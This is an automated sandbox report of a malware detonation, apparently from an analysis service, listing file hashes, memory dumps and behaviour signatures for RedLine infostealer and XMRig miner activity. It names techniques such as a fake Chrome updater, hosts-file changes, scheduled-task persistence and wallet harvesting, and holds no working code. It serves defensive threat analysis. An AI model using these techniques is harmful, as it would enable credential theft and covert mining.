memory/1664-382-0x000000013F850000-0x0000000140AB5000-memory.dmp

memory/1664-383-0x00000000772E0000-0x0000000077489000-memory.dmp

memory/1668-385-0x0000000002F90000-0x0000000002FD0000-memory.dmp

memory/1668-389-0x0000000002D90000-0x0000000002DD2000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Network\Cookies

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Session Storage\CURRENT~RFf778028.TMP

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\000002.dbtmp

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 1b76affc0777c3b021cf9f17c8865ffb
SHA1 82904bfdd2b0d7c493c47af202b12cb7839d3bff
SHA256 6899f0599da26257cc5db2e5a378f26553f38ac25038c0ed6478c8581634f87b
SHA512 afad96d3c9ae09df659058343d78ea21fcba21f3dff5b8e2a8c6e1cbfd487551d0aa758cc8ab769fabbd6b48b9176fae0ac4f834eb277ddac59cc5925af771c7

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Service Worker\ScriptCache\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

memory/1664-556-0x00000000772E0000-0x0000000077489000-memory.dmp

memory/1664-555-0x000000013F850000-0x0000000140AB5000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 fc0bf2769d0f04204ffb41f2b9e34eed
SHA1 59ace5c0941accd0cedc150a82c92b76f1eadd5d
SHA256 ecb4153de90c3f487ea4b6a0b0d9d9be4899e0f0916205f9973f87a19204069f
SHA512 74032f8a0108fdc1c99a4294e909a7db2ee48e3e8e69941238e1342c2a010ec88b76f12c46cc2862ce2c21625cfc2e5df7e7a01db827063dc91a900da00a4499

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\DawnCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\GPUCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\GPUCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\GPUCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\DevToolsActivePort

MD5 5b975073e1ffaaeae7201e98d7a1f6cb
SHA1 167ef4a630e54a7f726e76997cff28de1cb921a0
SHA256 675b4ddd4bc6826579c52b142bccc673a8d63e1b33437d73984abcd1cff79a8e
SHA512 286d7feb9d620a75720a72db34185a551c76a49c4a5fdf51690d15ec518a8da538716ee4d30d0c3e6317a7dfba921e89617803e3c433b238ece3f81ec7b25c38

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Code Cache\js\2e64514b9cd267ab_0

MD5 c896f1c9beb6dceb198275bd1e1315e4
SHA1 828bb3704a97cc2878eb2fd23e0e2a386cca30a0
SHA256 f9fa0a9069a297378a3e59e91fa5aa6c9468e8a56bb6463e5df6927c806b3ade
SHA512 b8ab7e4e65437038816639bc53f9309f9c75451adb9b85e0ebc49ca11678e5aa9d70b9c876cc46214fb0ad5155bcbb0b873ebb80fdc534323a58ee52adfe9745

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Code Cache\js\2b3a9481efde3cbc_0

MD5 4e56664468a04e1e98da1feb0f2039a8
SHA1 6edfd35add9130bed8740d8d644e3e6df63cafd9
SHA256 9e50ec5d5e8aa43b275d00b766f6feca975be70ec1bfe1e71ea8ff51f397eceb
SHA512 39ff7ba5a08322c5bd325af4f15795db84ab4a245a6e2780a95e5c08c48f5545e6a6a208569b6f0e83717bf9341f17d5a477a137c51eac824459dfbbbfdac834

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Code Cache\js\2016c72aa5f54f52_0

MD5 621c3438c2201381503216bc82f1b9b8
SHA1 cbc2d40ca05d1aaaf5375760cf798126f62104f7
SHA256 997e00e1e5a61f6dc54a4efcd59cffc7858a617118eb51301b51f2b87b488289
SHA512 6d55e44d2d664393b181d9197001a4d0d479d35d8776210aa19562094cc4eafc2231feb8535d1a8817fa62146ba3f1ec3295f53fa847744c4cc4cbb376c6290f

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Code Cache\js\10e544c7a72e2f65_0

MD5 1f909b9f819f7451056206c332862343
SHA1 2f2333d4c93e074089a53a0a8c592c1a05d68803
SHA256 29d9db7ebae99f81074f9258e766e461944f4f2c9136ec17768ee2f7533e76a7
SHA512 4ee354ce54bfae338c40019544f6aa38ca43e1ca676e66d01c295d3d4b11f2c86364e9109634722b3e0da1d9dcb3f0369c8e910931ada1b98c4e66a3040f281a

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Code Cache\js\09573a350af940e7_0

MD5 16e8eeb48e04d207ab04724eba3b26f0
SHA1 725c6d5f79a50c44b3ef4196d675e2db3d263d6f
SHA256 4cf1ab3c7eb542c879ea81ab8f63eccb93388d889c791c8a158aec76a551f57d
SHA512 a17dd8be1c4ec84babf87c2ee5663066d1ed8b0284b054b320af25c8e85de000e571c56d2c8705aab48e138f845d087bbba13aa0bfa0922bda768ca7f68d1d2a

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Code Cache\js\06db5837b6c74111_0

MD5 c53c1241c2257991c4a51c5360673af4
SHA1 edf1eb527e38eef5a701f560e5d318d533b93d50
SHA256 a7201b092a458dfd37652f9f69bf5c76d634f5ba7c394c0e8124bd1c0026e730
SHA512 7b500dc5b7aa02179db066ed52f606a7d455b7e7d4665d01548cf252d96adc788cd7e564a48399589300402be0559b76db4bcfeb2aa3c0b61a98852d0859c6a2

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\index

MD5 edc7b264910eae8bd617254de9a08071
SHA1 c6a99c13d202d60dd57274d43b56ac180ba90956
SHA256 0a96742762152608f9bd36ca2adc3d479f3e5729448967580221a44cf8862c2d
SHA512 b832bbe13d8ae49daa5c335f08fc2ab4e272df44e1a60df01d38e48b6cfaaf4e4be503f364c0d7930c84f27020d6eb902e4df6d901d039719071b10ca613f890

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_000012

MD5 3eff107111d8dfc91e048573b1f227d8
SHA1 dde20da014e819d11e138b346121cc97791e9dcd
SHA256 0e8fc4bbc6a3e0c34adf9ee888b297d516d0db0a9cdc5b3632a01484d418374d
SHA512 223386fb5bd3709b1929a52ead00e81494fe81f822301acbf3920a4292432ffce5dda21c503622f9f373807cd447b7209a8dfd193d4ce8cc44e0b100db8a74fd

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_000011

MD5 af5094423f8dcbd63dbbfccd1598be41
SHA1 d5f212b31dc86dd9f1d8f4b012783af961f920b5
SHA256 80b2f6b064b59afdbb209459b8dbede829bfee906baedc0cc60d526bf1bad058
SHA512 41e94ef63d25221daed04e7a81ca491ab9516e2a1f97cb3c705cac172b79dd65c84dc43ad575d14cf176b68c4f1ad58f7d08addf216172f0631ec88e6b100a93

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_000010

MD5 d75ebe2eae6831b2bad7c665fa05b3c0
SHA1 a27cd3066609c8a224cef7efa40c2cf630e55062
SHA256 45b20e9d4ecb765ff1f346e050930f8142e92cfbe54675d166c03fa2ca0154da
SHA512 64e5dfb1b8e3d78166723a12a1856d17a577df364694404c27979bc24e9305f60370719e78b5d906f7c00dc6fb8792f0f9d598eccdbd9ec260e487ecc6b14f0e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_00000f

MD5 789fd4f17cc11ac527dc82ac561b3220
SHA1 83ac8d0ad8661ab3e03844916a339833169fa777
SHA256 5459e6f01b7edde5f425c21808de129b69470ee3099284cb3f9413d835903739
SHA512 742d95bb65dcc72d7ce7056bd4d6f55e2811e98f7a3df6f1b7daef946043183714a8a3049b12a0be8ac21d0b4f6e38f7269960e57b006dfec306158d5a373e78

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_00000e

MD5 250bdff8769a9791656b1475a293c486
SHA1 31ccb16008e78db499d1cc68cff74ebf1979f1a1
SHA256 aca7dc1db7b861fa7c839ae3c537ed48b098ffedc1151c0fb95e744af1cb7738
SHA512 ba37f07adc32644e34700559f11a654a7862787ab1bb5bd53040c42b16a80f336823dca61e202a07130ad0845335b2d92b404567eded9619b4569d1b544ebcf2

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_00000d

MD5 189badc72a668aade50699ae05067c2a
SHA1 5458410fc96bcf08b29f204b05470dad5882afb9
SHA256 896d76b06fe7bc62fa10e8f9091b84584d8fdbd7eaaea1183f7c1e5e3a98c559
SHA512 287ff71f9b6ab261f989792cfee0b99e1745c57e8e8c9c3c55e07592a835008673a9ee5b2099ef9beb6ef4343c10827109b281b2fbed0fe0de1da020723c622b

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_00000c

MD5 7db3096a5ce269d5140afbedb84e0fb7
SHA1 1155014e26835855c4177e8916b0bbcd5e4cca61
SHA256 48662b9313a828746c1ba3edfa196d8ecd6b0ca730848ead5418fcde8da4a809
SHA512 a349f3265db5ebff9e535778ccc92bc846fa9a4175dbf4d9c0e5b77d294ae521eca5f104d45f0eab0bba88120a08103ce997a420ecace703e211796e842ca7dc

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_00000b

MD5 9f1c899a371951195b4dedabf8fc4588
SHA1 7abeeee04287a2633f5d2fa32d09c4c12e76051b
SHA256 ba60b39bc10f6abd7f7a3a2a9bae5c83a0a6f7787e60115d0e8b4e17578c35f7
SHA512 86e75284beaff4727fae0a46bd8c3a8b4a7c95eceaf45845d5c3c2806139d739c983205b9163e515f6158aa7c3c901554109c92a7acc2c0077b1d22c003dba54

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_00000a

MD5 2d52125a96fb5a7227c67848bc18f65c
SHA1 a3593c6d8e3b6b458b6bbc2c6423dc76e30a84a3
SHA256 61f3154c19e46e1989d6fadbfe20835d0c9fc47242dc5828e776e3ec667fda24
SHA512 5f151708007cb474e64e8968b1f6b5e5331c434cc237627c6c5c92d1894d020f476ad88461e35fbf383aa46750a9cdcaf3a2ac8fe90570753c73fcf17ac0cbe6

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_000009

MD5 7d75a9eb3b38b5dd04b8a7ce4f1b87cc
SHA1 68f598c84936c9720c5ffd6685294f5c94000dff
SHA256 6c24799e77b963b00401713a1dbd9cba3a00249b9363e2c194d01b13b8cdb3d7
SHA512 cf0488c34a1af36b1bb854dea2decfc8394f47831b1670cab3eed8291b61188484cc8ab0a726a524ecdd20b71d291bcccbc2ce999fd91662aca63d2d22ed0d9f

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_000008

MD5 c101a8ba729b894927d7d884e4be68a8
SHA1 4bf48f94ff4e50e81c9d83b641af74b3bed580a0
SHA256 544f08482a62485be4acbc443462b01fe16b408b3d154c0cb1ff921a453cee33
SHA512 77483a92abeed799dfb1e782988569875b29eccebfb14e5be353302849ea6f0ac6a6411a72d6da706ec3767a54f12907fd0bfa4646ad4ca1cf4e1e15fbe9a9ed

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_000007

MD5 f03b2a8e7ab245e03fc0609c96c949e9
SHA1 6bb1564e13187fdf8e4722e509983ec80bf45724
SHA256 52ba2e87765b525803652b484d86a48af8fb5488dc102500f6ed010072d01321
SHA512 99026ce60571e4903a33be62b55d60b44487c3cae1af4b0c71e276d91ab62307d0bd63ed46e1949f06ef80c84a15cbb44cff4af2b5f592af91f215b40bb8e8f4

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_000006

MD5 6a3bb9c5ba28ee73af6c1b53e281b0cf
SHA1 d96e403c99c1707f82ea29c2c1f134e792c64097
SHA256 2f5adfc38558162578ffe112229f10417fbc4b3df025d153d4e22a0c95177740
SHA512 6c4844f70969938339cb6716a834a79e1a8379459c87b983c2518b9cbb560cb2f101aff980f682989928523be6cdc99bde3bfd8137f9c54a58191b900b580fbf

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_000005

MD5 5641d2e6eb6f88f5c306ef14bcda7513
SHA1 1714fcfbf63fc8d860c0edb99ca221ac99194f07
SHA256 d573a0546fac381049946c0b0bdad4c42d2e60b572b79ed8c41e51894d9ef1ab
SHA512 2f4d2220ce860110fb6ad9b438b05d43551577f93f45bc97f56aa80c89e1a369734b64c190335a9df1963c547a5b607c5f8e3e229da906a36ff6f96d387a1774

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_000004

MD5 b096dc9a3e4e6748a91abe826cf5d165
SHA1 b115fd9390e39b86a711039745cbad73741d7252
SHA256 7552567793d51609afaac7d5e1b3d2289f1a64a323a84c74c28fe615075e1c3f
SHA512 c075f36473b578f645ab66f1800d6e0a61b66719361c8c730ccb4505c1ab127ce96d5409c0c82aeddbc2bd03bef6c7a905310e4462ac7a0ebb2e07b45cf33a94

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_000003

MD5 21808cd0724524589cd4ec1ce26f6d58
SHA1 fc5cc4cb347ed20389626c58a6de396ef1ac5ada
SHA256 1a7608a326717e18f424991b924d9c7319eb273cc3af432585d95ce8b068ca8d
SHA512 36902ff35a1ed469aa9cab3856b1b0057ca7db8ea4d92ca1d129e68f02eebd5322a4e81aec29a2b1c0c289e2f82df13684ccf0305378878494260c4d4e6caf0d

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\f_000002

MD5 01af703c52ac5a93685bb3911d6918f1
SHA1 cbb1279745c1c2208fb9b8606e3d3513cd5dc3e7
SHA256 75ecbede729daef7531a6e43dcaf82afd1ac691c5a993231ddbe40254bf01653
SHA512 fbf1f2a3180f001cab1a860425f750010d6932479b343d5848ee0a78e03e29a46a123ee0103560d87df32daa3f6878cde07927e11e0615ad8e3c8e1568b942c6

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\data_3

MD5 81421137321ece3de85988fb03d253d5
SHA1 33cdde6378e005219fd7657b87915d35d07624a1
SHA256 0d14ed787c4fe9245df2c1124bc98fa6e30a0c6c7b55e94326d2ed88441d7e28
SHA512 47d8be089b8105694530f30988e8c0386019a3984faeddf29145a0b6b6f9bbf91ed2326908ad5296a6699774aa38cb93168516f01f3248169016fa574ee0f082

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\data_2

MD5 c82b8fb6221ff250eac0dc304a806fd1
SHA1 ea306835cf93d596ab9f998a4415d4d17b1fcdd9
SHA256 e32c348bfbc365b1b18fc1cadab9aa561855714a1da29a64e09cc3ab80f836bc
SHA512 fad982bcda7f763eb4e01da2924c038f359537e1aafee6e517942ab5b5bea2665aee1a81b25b4163d50c43c0a08b11a69446ccf5b4760c506394ee494e990d20

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\data_1

MD5 ef0c0ccef491d0f28be10aee8d498796
SHA1 8882451b8c716b6a8a8744c5d9c4055d1624685e
SHA256 92502c0aa9ead0df15a105541800178063d2ae7412d6b1afb3af82c7b4030026
SHA512 73f5325094a61901b200ad19a872d8b690c90f8e4a7f604ac1dea034e1625e218ea6595885d976ff98b39ab9127ddb01545f69f6d6c0b00e04b94060090606b1

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\data_0

MD5 58d10f941444fb5a3d9a4b6d646b7b1d
SHA1 974861942c807a7adeba558c347f8979b5cd8f22
SHA256 e1f60dd5512165f155104b5f3dcf7c232623c921e5825bc88b6dbbffa4488952
SHA512 3c25825680f21afbdf4e7c2e4b1be7e79849aca4c34e1bbf07cdd17e07026795ef777832d0877183a0cf13223bae156b14d7ee9fb44122337bcebb1a77afbdab

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\chrome_debug.log

MD5 7b1337c76ab33b915303603b6982e9b8
SHA1 49935a0acc647a72ebc71407ca3a72ab96288bcf
SHA256 2e9402ab1cc51e7097ced94c5c33d6956cf4d10a07ad48ebbf2d492b52ab4361
SHA512 3513482f3fb78be928fd01dab45b909025d2a8484d4ca24c4f86bef7a3163f09afc0a316b3ff5446143f38b2793bb33273a4b41495f0e4f050ba9b5d57db957f

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Crashpad\settings.dat

MD5 e97464a8a734e95498a104ffa66eaac3
SHA1 1af7be0237e74bc33ba40ab0e1a00aebbf76ff91
SHA256 f3d8d3715bd397224ca6144eb4d7e832193c0eca5c7c9a5d1302deeccae91a15
SHA512 e616c7415e711843ddc5caefdcea3f1e57de6ec6efe859dd536ca217f1288d8f826bcfedb911b67c4ee7c9b37963d42186fa635ea2c1daf642f4bfe5de2daf32

memory/1668-749-0x0000000074420000-0x0000000074B0E000-memory.dmp

memory/1668-748-0x0000000000B10000-0x0000000001144000-memory.dmp

memory/2996-750-0x00000000199E0000-0x0000000019CC2000-memory.dmp

memory/2996-751-0x0000000000AA0000-0x0000000000AA8000-memory.dmp

memory/2996-752-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

memory/2996-756-0x0000000001180000-0x0000000001200000-memory.dmp

memory/2996-755-0x0000000001180000-0x0000000001200000-memory.dmp

memory/2996-754-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

memory/2996-753-0x0000000001180000-0x0000000001200000-memory.dmp

memory/2996-758-0x0000000001180000-0x0000000001200000-memory.dmp

memory/2996-759-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-08-12 08:45

Reported

2023-08-12 08:47

Platform

win10v2004-20230703-en

Max time kernel

146s

Max time network

151s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Stops running service(s)

evasion

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3864 set thread context of 4624 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 3864 set thread context of 4180 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\explorer.exe
PID 2068 set thread context of 2920 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\Temp\setup.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
